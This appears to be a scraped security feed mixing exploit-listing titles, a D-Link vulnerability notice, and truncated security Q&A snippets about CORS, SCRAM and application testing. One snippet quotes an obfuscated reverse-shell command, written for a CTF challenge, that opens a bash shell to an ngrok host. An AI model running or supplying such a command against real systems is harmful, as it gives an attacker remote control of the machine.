[webapps] Check Point Security Gateway – Information Disclosure (Unauthenticated)
Aquatronica Control System 5.1.6 – Information Disclosure
changedetection < 0.45.20 – Remote Code Execution (RCE)
Does the CORS asterisk / wildcard (*) include both encrypted (https) and unencrypted origins (http)? And is the null origin (i.e., when a local file is doing a xmlhttprequest, or within an iframe with sandbox attribute) regarded as http?
…
$(/bin/prin[t]f ‘ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27’)
-i: -c: line 1: unexpected EOF while looking for matching `”
I was trying to get a reverse shell in this manner for a CTF cha…
Multiple D-Link device vulnerabilities are being actively targeted. Many of the routers and NAS devices are end-of-life (EOL) D-Link devices that do not have any patches available.
Article Link: https://www.youtube.com/watch?v=D5lQVdYYF4I
I would like to know if there is a way to run an app to exhaustion in terms of all possible outcomes that it can provide.
What do I mean by that:
Let’s assume that someone has an (Apache) HTTP Server. What I am trying to do is to create pr…
I’ve recently read about the SCRAM authentication protocol. One of the stated design motivations is to support mutual authentication, but how does the client verify that the salt and cost parameters provided by the server are correct?
If t…